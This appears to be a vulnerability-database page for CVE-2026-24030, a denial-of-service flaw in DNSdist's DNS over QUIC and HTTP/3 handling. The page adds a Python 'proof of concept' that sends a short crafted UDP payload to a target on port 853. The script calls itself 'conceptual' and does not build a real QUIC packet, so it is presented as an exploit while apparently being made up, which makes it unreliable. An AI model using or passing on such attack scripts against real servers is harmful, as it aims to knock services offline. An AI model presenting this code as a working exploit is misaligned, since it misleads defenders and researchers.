CVE-2026-24030 CVSS 5.3 MEDIUM

CVE-2026-24030

Published: 2026-03-31 12:16:28
Last Modified: 2026-04-14 16:15:29

Description

An attacker might be able to trick DNSdist into allocating too much memory while processing DNS over QUIC or DNS over HTTP/3 payloads, resulting in a denial of service. In setups with a large quantity of memory available this usually results in an exception and the QUIC connection is properly closed, but in some cases the system might enter an out-of-memory state instead and terminate the process.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-24030 # This script demonstrates how a crafted payload might trigger memory exhaustion. # Note: Actual exploitation requires a vulnerable version of DNSdist. import socket def trigger_dos(target_ip, target_port): """ Sends a large payload to the target to simulate memory exhaustion. """ try: # Create a UDP socket (QUIC uses UDP) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Simulate a malicious QUIC stream frame indicating a large data size # This is a conceptual representation. header = b'\x00\x00\x00\x00' # Simplified Header large_size_indicator = b'\xFF\xFF\xFF\xFF' # Claiming huge size payload = header + large_size_indicator print(f"[*] Sending payload to {target_ip}:{target_port}") sock.sendto(payload, (target_ip, target_port)) print("[+] Payload sent. Check server status.") except Exception as e: print(f"[-] Error: {e}") finally: sock.close() if __name__ == "__main__": trigger_dos("127.0.0.1", 853)
